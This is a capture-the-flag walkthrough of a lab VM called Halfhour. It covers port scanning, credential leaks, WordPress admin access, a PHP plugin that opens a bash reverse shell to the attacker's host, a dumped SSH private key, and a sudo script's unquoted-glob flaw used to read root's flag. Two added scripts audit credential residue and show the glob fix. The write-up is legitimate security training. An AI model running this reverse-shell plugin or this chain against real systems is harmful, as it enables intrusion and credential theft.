Halfhour

Target description

  • QQ group: 660930334

I. Information gathering

1. Host discovery

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-17 15:41 CST
Nmap scan report for 192.168.2.1
Host is up (0.00052s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00040s latency).
MAC Address: 08:00:27:E4:01:05 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.14
Host is up (0.0011s latency).
MAC Address: 08:00:27:F7:91:CD (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.22 seconds

The target IP is 192.168.2.14.

2. Port scanning

(1) Full TCP port scan

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap --min-rate 10000 -p- 192.168.2.14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-17 15:41 CST
Nmap scan report for 192.168.2.14
Host is up (0.00038s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1337/tcp open waste
1338/tcp open wmc-log-svc
MAC Address: 08:00:27:F7:91:CD (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.15 seconds

Open ports: 22, 80, 1337, 1338

(2) Service and version scan

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,1337,1338 192.168.2.14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-17 15:41 CST
Nmap scan report for 192.168.2.14
Host is up (0.0012s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: \xE6\xAD\xA3\xE5\x9C\xA8\xE8\xB7\xB3\xE8\xBD\xAC\xE5\x88\xB0 Maze
|_http-server-header: Apache/2.4.62 (Debian)
1337/tcp open waste?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe:
| Please enter password: Incorrect password. Attempts left: 2
| NULL:
|_ Please enter password:
1338/tcp open wmc-log-svc?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe:
| Please send new password:
| Congratulations! Password reset successful!
| password: bobobo
| NULL:
|_ Please send new password:
MAC Address: 08:00:27:F7:91:CD (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.26 seconds
  1. Port 22: SSH
  2. Port 80: HTTP
  3. Ports 1337 and 1338: unknown services; the banner on port 1338 leaks a password, bobobo

(3) UDP port scan

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap -sU --top-ports 100 192.168.2.14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-17 15:45 CST
Nmap scan report for 192.168.2.14
Host is up (0.00060s latency).
All 100 scanned ports on 192.168.2.14 are in ignored states.
Not shown: 56 closed udp ports (port-unreach), 44 open|filtered udp ports (no-response)
MAC Address: 08:00:27:F7:91:CD (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 54.79 seconds

No open UDP ports.

(4) NSE vulnerability scripts

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap --script=vuln -p22,80,1337,1338 192.168.2.14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-17 15:47 CST
Nmap scan report for 192.168.2.14
Host is up (0.00042s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
1337/tcp open waste
1338/tcp open wmc-log-svc
MAC Address: 08:00:27:F7:91:CD (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.58 seconds

Nothing useful here.

II. Exploitation and credential harvesting

1. Probing the unknown ports

(1) Port 1337

Connect to port 1337 with nc

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nc 192.168.2.14 1337
Please enter password: miao
Incorrect password. Attempts left: 2
miao
Incorrect password. Attempts left: 1
miao
Too many failed attempts. Reset password? (yes/no)yes
Please send new password to port 1338.

This is a password-check service; after too many failed attempts it offers a reset through port 1338.

(2) Port 1338

Connect to port 1338 with nc

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nc 192.168.2.14 1338
Please send new password: miao
Congratulations! Password reset successful!
Old password: bobobo

The service reports that the password was reset and returns the old password, bobobo.

Connecting to port 1337 again and entering the newly set password, it is still rejected:

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nc 192.168.2.14 1337
Please enter password: miao
Incorrect password. Attempts left: 2

Trying the old password bobobo instead is accepted, so bobobo is a usable credential:

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nc 192.168.2.14 1337
Please enter password: bobobo
Password correct!

2. Web: port 80

Visiting port 80 reveals a hostname, halfhour.dsz

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# curl http://192.168.2.14
<!-- halfhour.dsz -->
...

After adding the hostname to the hosts file and visiting again, the site turns out to be built on WordPress.

3. WordPress

The "Hello world!" post (您好,世界!) reveals a username, todd. Combined with the password bobobo recovered earlier, try logging in to the admin panel.

Login succeeds; the WordPress version is 6.8.2.

Under Plugins, a plugin package containing a reverse shell can be uploaded, installed and activated.

WordPress reverse-shell plugin

<?php
/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin for penetration testing.
* Version: 1.0
* Author: Security Analyst
* Author URI: http://www.example.com
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.2.4/4444 0>&1'");
?>

III. Getting a www-data shell

Start a listener on Kali

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nc -lvnp 4444
listening on [any] 4444 ...

Install and activate the plugin; a shell comes back

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.14] 58048
bash: cannot set terminal process group (436): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Halfhour:/var/www/halfhour.dsz/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Upgrading to a stable shell

script /dev/null -c bash
# press Ctrl+Z to suspend it
stty raw -echo; fg
# press Enter
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

IV. Privilege escalation

1. Getting nxal (rabbit hole)

Listing /home shows three users, but only nxal's directory is readable.

www-data@Halfhour:/home$ ls -la
total 20
drwxr-xr-x 5 root root 4096 Sep 14 05:20 .
drwxr-xr-x 18 root root 4096 Mar 18 2025 ..
drwxr-xr-x 3 nxal nxal 4096 Sep 14 05:20 nxal
drwx------ 2 wangjiang wangjiang 4096 Sep 14 05:55 wangjiang
drwx------ 2 welcome welcome 4096 Sep 14 05:26 welcome

nxal's home directory contains an SSH key pair, world-readable:

www-data@Halfhour:/home/nxal/.ssh$ ls -la
total 16
drwxr-xr-x 2 nxal nxal 4096 Sep 14 05:15 .
drwxr-xr-x 3 nxal nxal 4096 Sep 14 05:20 ..
-rwxr-xr-x 1 nxal nxal 2602 Sep 14 05:15 id_rsa
-rwxr-xr-x 1 nxal nxal 567 Sep 14 05:15 id_rsa.pub
www-data@Halfhour:/home/nxal/.ssh$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Logging in with nxal's private key gives the nxal account

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# chmod 600 id

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# ssh nxal@192.168.2.14 -i id
nxal@192.168.2.14's password:
Linux Halfhour 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 14 05:50:25 2025 from 192.168.3.94
nxal@Halfhour:~$ id
uid=1001(nxal) gid=1001(nxal) groups=1001(nxal)

2. Getting wangjiang

The WordPress configuration file contains two passwords: root123 (in a commented-out line) and your_strong_password

nxal@Halfhour:/var/www/halfhour.dsz$ cat wp-config.php 
...
/** Database username */
define( 'DB_USER', 'wpuser' );

/** Database password */
/* define( 'DB_PASSWORD', 'root123' ); */
define( 'DB_PASSWORD', 'your_strong_password' );

Trying them against the local users: wangjiang with password root123 logs in successfully

nxal@Halfhour:/var/www/halfhour.dsz$ su wangjiang
Password:
wangjiang@Halfhour:/var/www/halfhour.dsz$ id
uid=1002(wangjiang) gid=1002(wangjiang) groups=1002(wangjiang)

3. Getting welcome

wangjiang's home directory contains a .mysql_history file

wangjiang@Halfhour:~$ ls -la
total 32
drwx------ 2 wangjiang wangjiang 4096 Sep 14 05:55 .
drwxr-xr-x 5 root root 4096 Sep 14 05:20 ..
-rw-r--r-- 1 wangjiang wangjiang 220 Sep 14 05:20 .bash_logout
-rw-r--r-- 1 wangjiang wangjiang 3526 Sep 14 05:20 .bashrc
-rw------- 1 wangjiang wangjiang 1516 Sep 14 05:14 .mysql_history
-rw-r--r-- 1 root root 23 Sep 14 05:24 note.txt
-rw-r--r-- 1 wangjiang wangjiang 807 Sep 14 05:20 .profile
-rw-r--r-- 1 root root 44 Sep 14 05:14 user.txt

Reading it reveals welcome's password, 4c850c5b3b2756e67a91bad8e046ddac

wangjiang@Halfhour:~$ cat .mysql_history 
....
INSERT\040INTO\040user\040(username,\040password)\040\040VALUES\040('welcome',\040'4c850c5b3b2756e67a91bad8e046ddac')\040ON\040DUPLICATE\040KEY\040UPDATE\040password\040=\040VALUES(password); show\040tables; select\040*\040from\040users; select\040*\040from\040user;
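Both credential leaks above, the commented-out DB_PASSWORD in wp-config.php and the password literal left in .mysql_history, are residue a host audit can look for. The script below is an added example, not part of the original write-up: it builds two constructed stand-in files (the paths, values and the heuristic grep patterns are assumptions, not the VM's real files) and counts the suspicious lines in each.

```shell
#!/bin/sh
# Added example (not part of the original write-up): audit for credential residue of the
# two kinds found on this box. All files below are constructed inside a scratch directory.
set -eu

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT

# Constructed stand-in for wp-config.php: a previous password left behind in a comment
cat > "$WORK/wp-config.php" <<'EOF'
<?php
define( 'DB_USER', 'wpuser' );
/* define( 'DB_PASSWORD', 'old_password_placeholder' ); */
define( 'DB_PASSWORD', 'current_password_placeholder' );
EOF

# Constructed stand-in for ~/.mysql_history (the mysql client writes spaces as \040)
cat > "$WORK/.mysql_history" <<'EOF'
show\040tables;
INSERT\040INTO\040user\040(username,\040password)\040VALUES\040('welcome',\040'hash_placeholder');
select\040*\040from\040user;
EOF

# Heuristic: a commented-out define() of a credential constant. A commented-out secret is
# still a secret, and on this box it was also reused as a local account password.
COMMENTED_DEFINE='^[[:space:]]*(/\*|//|#).*define\([[:space:]]*.(DB_PASSWORD|DB_USER|AUTH_KEY)'

# Print matching lines with line numbers (for a human reading the report)
report_commented_secrets() {
    grep -nE "$COMMENTED_DEFINE" "$1" || true
}

# Return the number of matching lines (for scripted checks); grep -c prints 0 on no match
count_commented_secrets() {
    grep -cE "$COMMENTED_DEFINE" "$1" || true
}

# Heuristic: history statements that carry password material. \040 is decoded first so the
# report reads as the statement the user typed.
report_history_secrets() {
    sed 's/\\040/ /g' "$1" | grep -niE 'password|identified by' || true
}

count_history_secrets() {
    sed 's/\\040/ /g' "$1" | grep -ciE 'password|identified by' || true
}

echo "== commented-out credential defines in wp-config.php =="
report_commented_secrets "$WORK/wp-config.php"
echo "== statements with password material in .mysql_history =="
report_history_secrets "$WORK/.mysql_history"
```

Both patterns are deliberately loose: a column named password or a harmless comment will match too, and the point is to surface lines for review rather than to classify them. The fix on the client side is to keep password-bearing statements out of the history altogether, for example by exporting MYSQL_HISTFILE=/dev/null before running the client, and on the config side to delete superseded secrets rather than comment them out and rotate anything that was ever committed.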

Use the credential to switch to welcome

wangjiang@Halfhour:~$ su welcome
Password:
welcome@Halfhour:/home/wangjiang$ id
uid=1000(welcome) gid=1000(welcome) groups=1000(welcome)

4. Getting root

Checking sudo rights: /usr/local/bin/del.sh can be run as root without a password

welcome@Halfhour:/home/wangjiang$ sudo -l
Matching Defaults entries for welcome on Halfhour:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on Halfhour:
(ALL) NOPASSWD: /usr/local/bin/del.sh

Script contents

welcome@Halfhour:/usr/local/bin$ cat del.sh 
#!/bin/bash

PATH=/usr/bin
cd /tmp
cat /root/root.txt | tr -d [A-Za-z0-9]

Explanation of the script:
The script is meant to read /root/root.txt and pipe it through tr -d [A-Za-z0-9], stripping every letter and digit so that the real flag stays hidden.
However, the script has a serious flaw: the argument to tr, [A-Za-z0-9], is not quoted. This is a classic shell pathname-expansion (globbing) bug.

  1. When the shell runs the tr command, it first processes the command-line arguments.
  2. Because [A-Za-z0-9] is unquoted, the shell treats it as a glob pattern meaning "any file in the current directory whose name is a single letter or digit".
  3. The cd /tmp earlier in the script has changed the working directory to the world-writable /tmp.
  4. So a file whose name matches the pattern, for example A, B or 1, can be created in /tmp.
  5. When the script runs, the shell finds the file A in /tmp and substitutes the filename A for the pattern [A-Za-z0-9].
  6. The command actually executed therefore changes from tr -d [A-Za-z0-9] to tr -d A.
     What was meant to delete every letter and digit now deletes only the character 'A'. Since the flag contains no upper-case 'A', the flag is printed intact.

As long as no file in /tmp matches the pattern, the shell passes it through literally and tr behaves as intended, which is why the defect is invisible until something is placed in that directory.

Build the chain and read root's flag

welcome@Halfhour:/usr/local/bin$ cd /tmp
welcome@Halfhour:/tmp$ touch A
welcome@Halfhour:/tmp$ sudo /usr/local/bin/del.sh
flag{root-4c850c5b3b2756e67a91bad8e046ddac}
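The defect above, reproduced as an added example that is not part of the original write-up or the VM's del.sh: a scratch directory stands in for /tmp, a constructed string stands in for /root/root.txt, and the unquoted pattern is shown beside its quoted fix, together with the empty-directory case that makes the bug easy to miss in testing.

```shell
#!/bin/sh
# Added example (not the VM's del.sh): reproduce the unquoted-glob defect in a scratch
# directory and show the quoted, correct form beside it. The secret below is constructed.
set -eu

SAMPLE_SECRET='flag{root-0123abcd}'   # constructed stand-in for the contents of /root/root.txt

# Scratch directory playing the role of the world-writable /tmp that del.sh cd's into
WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT

# A file whose one-character name matches the bracket expression
touch "$WORK/A"

# Mirrors del.sh: the pattern is unquoted, so the shell expands it against the current
# directory before tr runs. With A present, tr receives the argument "A" and deletes
# only that character, so the secret passes through untouched.
vulnerable_filter() {
    ( cd "$WORK" && printf '%s\n' "$SAMPLE_SECRET" | tr -d [A-Za-z0-9] )
}

# Fixed form: single quotes stop pathname expansion, tr receives the literal set and
# removes every letter, digit and the bracket characters, leaving only punctuation.
safe_filter() {
    ( cd "$WORK" && printf '%s\n' "$SAMPLE_SECRET" | tr -d '[A-Za-z0-9]' )
}

# The same unquoted form in a directory with no matching file: the shell leaves the
# pattern literal and the output looks correct, which is why the bug survives testing.
vulnerable_filter_empty_dir() {
    ( mkdir -p "$WORK/empty" && cd "$WORK/empty" \
      && printf '%s\n' "$SAMPLE_SECRET" | tr -d [A-Za-z0-9] )
}

printf 'unquoted, file A present  : %s\n' "$(vulnerable_filter)"
printf 'quoted pattern            : %s\n' "$(safe_filter)"
printf 'unquoted, empty directory : %s\n' "$(vulnerable_filter_empty_dir)"
```

shellcheck reports the unquoted form as SC2060 ("Quote parameters to tr to prevent glob expansion"), so a lint pass over anything referenced by a sudoers NOPASSWD entry would have caught this before deployment. Independently of the quoting, a privileged script should not cd into a directory other users can write to, since any unquoted pattern or relative path it uses from then on is under their control.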

In fact, root's password is bobobo as well

welcome@Halfhour:/tmp$ su root
Password:
root@Halfhour:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

V. Flags

root@Halfhour:/tmp# cat /home/wangjiang/user.txt /root/root.txt 
flag{user-4c850c5b3b2756e67a91bad8e046ddac}
flag{root-4c850c5b3b2756e67a91bad8e046ddac}

Halfhour
http://miao-sec.github.io/Maze-sec/Halfhour/
Author: Miao
Published: 9 January 2026
License: BY-MIAO